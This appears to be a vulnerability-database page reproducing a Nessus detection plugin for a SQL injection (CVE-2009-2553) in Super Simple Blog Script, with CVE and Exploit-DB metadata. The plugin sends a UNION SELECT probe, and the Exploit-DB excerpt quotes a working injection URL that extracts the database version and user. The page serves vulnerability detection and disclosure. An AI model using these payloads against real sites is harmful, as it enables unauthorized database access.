Search...

Super Simple Blog Script entry Parameter SQL Injection

2010-10-20T00:00:00

ID SUPER_SIMPLE_BLOG_ENTRY_PARAMETER_SQLI.NASL
Type nessus
Reporter This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.
Modified 2021-01-02T00:00:00

Description

The remote Super Simple Blog Script install hosted on the remote web server is affected by a SQL injection vulnerability because its 'comments.php' script does not properly sanitize input to the 'entry' parameter before using it a database query.

Regardless of PHP's 'magic_quotes_gpc' setting, an unauthenticated remote attacker can leverage this issue to manipulate database queries, leading to disclosure of sensitive information, attacks against the underlying database, and the like.

Note that the application may also be affected by a related local file inclusion vulnerability, although Nessus has not checked for that.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#


if (NASL_LEVEL &lt; 3000) exit(1);


include("compat.inc");


if (description)
{
  script_id(50048);
  script_version("1.6");
  script_cvs_date("Date: 2018/07/31 17:27:53");

  script_cve_id("CVE-2009-2553");
  script_bugtraq_id(43524);
  script_xref(name:"EDB-ID", value:"9180");

  script_name(english:"Super Simple Blog Script entry Parameter SQL Injection");
  script_summary(english:"Tries to manipulate the comment form");

  script_set_attribute(
    attribute:"synopsis",
    value:
"A PHP application hosted on the remote web server is affected by a
SQL injection vulnerability."
  );
  script_set_attribute(
    attribute:"description",
    value:
"The remote Super Simple Blog Script install hosted on the remote web
server is affected by a SQL injection vulnerability because its
'comments.php' script does not properly sanitize input to the 'entry'
parameter before using it a database query.

Regardless of PHP's 'magic_quotes_gpc' setting, an unauthenticated
remote attacker can leverage this issue to manipulate database
queries, leading to disclosure of sensitive information, attacks
against the underlying database, and the like.

Note that the application may also be affected by a related local file
inclusion vulnerability, although Nessus has not checked for that."
  );
  script_set_attribute(attribute:"solution", value:"Upgrade to Super Simple Blog Script 2.56 or later.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");
 script_cwe_id(89);

  script_set_attribute(attribute:"vuln_publication_date", value:"2009/07/17");
  script_set_attribute(attribute:"patch_publication_date", value:"2009/08/06");
  script_set_attribute(attribute:"plugin_publication_date", value:"2010/10/20");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.");

  script_dependencies("super_simple_blog_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/super_simple_blog");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");

port = get_http_port(default:80, php:TRUE);

install = get_install_from_kb(appname:'super_simple_blog', port:port, exit_on_fail:TRUE);
dir = install['dir'];

# This function converts a string to a concatenation of hex chars so we
# can pass in strings without worrying about PHP's magic_quotes_gpc.
function hexify(str)
{
  local_var hstr, i, l;

  l = strlen(str);
  if (l == 0) return "";

  hstr = "concat(";
  for (i=0; i&lt;l; i++)
    hstr += hex(ord(str[i])) + ",";
  hstr[strlen(hstr)-1] = ")";

  return hstr;
}


magic1 = SCRIPT_NAME;
magic2 = unixtime();
exploit = "-1 UNION SELECT 0," + hexify(str:magic2+'" /&gt;\r\n&lt;p&gt;NESSUS:&lt;br /&gt;&lt;input type="text" name="nessus" style="width:280px;" value="'+magic1);

url = dir + '/comments.php?entry='+str_replace(find:" ", replace:"%20", string:exploit);

r = http_send_recv3(
  port         : port,
  method       : 'GET',
  item         : url,
  exit_on_fail : TRUE
);

if (
  '&lt;input type="hidden" name="orig_time" value="'+magic2+'" /&gt;' &gt;&lt; r[2] &&
  '&lt;p&gt;NESSUS:&lt;br /&gt;&lt;input type="text" name="nessus" style="width:280px;" value="'+magic1+'" /&gt;' &gt;&lt; r[2]
)
{
  set_kb_item(name:"www/"+port+"/SQLInjection", value:TRUE);

  if (report_verbosity &gt; 0)
  {
    report = get_vuln_report(
      items     : url,
      port      : port
    );
    security_hole(port:port, extra:report);
  }
  else security_hole(port);
}
else exit(0, "The Super Simple Blog Script install at "+build_url(port:port, qs:dir+'/')+" is not affected.");

JSON Vulners Source

Initial Source

{"id": "SUPER_SIMPLE_BLOG_ENTRY_PARAMETER_SQLI.NASL", "bulletinFamily": "scanner", "title": "Super Simple Blog Script entry Parameter SQL Injection", "description": "The remote Super Simple Blog Script install hosted on the remote web\nserver is affected by a SQL injection vulnerability because its\n'comments.php' script does not properly sanitize input to the 'entry'\nparameter before using it a database query.\n\nRegardless of PHP's 'magic_quotes_gpc' setting, an unauthenticated\nremote attacker can leverage this issue to manipulate database\nqueries, leading to disclosure of sensitive information, attacks\nagainst the underlying database, and the like.\n\nNote that the application may also be affected by a related local file\ninclusion vulnerability, although Nessus has not checked for that.", "published": "2010-10-20T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/50048", "reporter": "This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.", "references": [], "cvelist": ["CVE-2009-2553"], "type": "nessus", "lastseen": "2021-01-01T05:50:15", "edition": 23, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2553"]}, {"type": "exploitdb", "idList": ["EDB-ID:9180"]}], "modified": "2021-01-01T05:50:15", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-01-01T05:50:15", "rev": 2}, "vulnersScore": 5.9}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\nif (NASL_LEVEL < 3000) exit(1);\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(50048);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/31 17:27:53\");\n\n script_cve_id(\"CVE-2009-2553\");\n script_bugtraq_id(43524);\n script_xref(name:\"EDB-ID\", value:\"9180\");\n\n script_name(english:\"Super Simple Blog Script entry Parameter SQL Injection\");\n script_summary(english:\"Tries to manipulate the comment form\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A PHP application hosted on the remote web server is affected by a\nSQL injection vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote Super Simple Blog Script install hosted on the remote web\nserver is affected by a SQL injection vulnerability because its\n'comments.php' script does not properly sanitize input to the 'entry'\nparameter before using it a database query.\n\nRegardless of PHP's 'magic_quotes_gpc' setting, an unauthenticated\nremote attacker can leverage this issue to manipulate database\nqueries, leading to disclosure of sensitive information, attacks\nagainst the underlying database, and the like.\n\nNote that the application may also be affected by a related local file\ninclusion vulnerability, although Nessus has not checked for that.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Super Simple Blog Script 2.56 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(89);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/07/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"super_simple_blog_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/super_simple_blog\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_install_from_kb(appname:'super_simple_blog', port:port, exit_on_fail:TRUE);\ndir = install['dir'];\n\n# This function converts a string to a concatenation of hex chars so we\n# can pass in strings without worrying about PHP's magic_quotes_gpc.\nfunction hexify(str)\n{\n local_var hstr, i, l;\n\n l = strlen(str);\n if (l == 0) return \"\";\n\n hstr = \"concat(\";\n for (i=0; i<l; i++)\n hstr += hex(ord(str[i])) + \",\";\n hstr[strlen(hstr)-1] = \")\";\n\n return hstr;\n}\n\n\nmagic1 = SCRIPT_NAME;\nmagic2 = unixtime();\nexploit = \"-1 UNION SELECT 0,\" + hexify(str:magic2+'\" />\\r\\n<p>NESSUS:<br /><input type=\"text\" name=\"nessus\" style=\"width:280px;\" value=\"'+magic1);\n\nurl = dir + '/comments.php?entry='+str_replace(find:\" \", replace:\"%20\", string:exploit);\n\nr = http_send_recv3(\n port : port,\n method : 'GET',\n item : url,\n exit_on_fail : TRUE\n);\n\nif (\n '<input type=\"hidden\" name=\"orig_time\" value=\"'+magic2+'\" />' >< r[2] &&\n '<p>NESSUS:<br /><input type=\"text\" name=\"nessus\" style=\"width:280px;\" value=\"'+magic1+'\" />' >< r[2]\n)\n{\n set_kb_item(name:\"www/\"+port+\"/SQLInjection\", value:TRUE);\n\n if (report_verbosity > 0)\n {\n report = get_vuln_report(\n items : url,\n port : port\n );\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse exit(0, \"The Super Simple Blog Script install at \"+build_url(port:port, qs:dir+'/')+\" is not affected.\");\n", "naslFamily": "CGI abuses", "pluginID": "50048", "cpe": [], "scheme": null}

{"cve": [{"lastseen": "2020-10-03T11:54:15", "description": "Multiple SQL injection vulnerabilities in comments.php in Super Simple Blog Script 2.5.4, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the entry parameter.", "edition": 3, "cvss3": {}, "published": "2009-07-20T20:00:00", "title": "CVE-2009-2553", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2553"], "modified": "2017-09-19T01:29:00", "cpe": ["cpe:/a:supersimple:super_simple_blog_script:2.5.4"], "id": "CVE-2009-2553", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2553", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:supersimple:super_simple_blog_script:2.5.4:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-01T10:03:04", "description": "Super Simple Blog Script 2.5.4 (entry) SQL Injection Vulnerability. CVE-2009-2553. Webapps exploit for php platform", "published": "2009-07-17T00:00:00", "type": "exploitdb", "title": "Super Simple Blog Script 2.5.4 entry SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2553"], "modified": "2009-07-17T00:00:00", "id": "EDB-ID:9180", "href": "https://www.exploit-db.com/exploits/9180/", "sourceData": "----------[exploit Debut]\n[Remote SQL Injection Vulnerability]\n----------[Script Info]\n\nMoi\t: JIKO\nSite\t: No-exploit.Com\nEmail\t: mm :( Moghla9 Ferme Closed\n\n----------[Script Info]\n\nSite:http\t: http://www.supersimple.org/\nDownload\t: http://supersimple.org/downloads/SuperSimpleBlogScriptV2_5_4.zip\n\n----------[exploit Info]\n\n1]~[Sql]\nhttp://localhost/Path/comments.php?entry=-122222 union select 0,concat(0x223E,version(),0x3A,user())--\n----------[exploit Fin]\n\n# milw0rm.com [2009-07-17]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9180/"}]}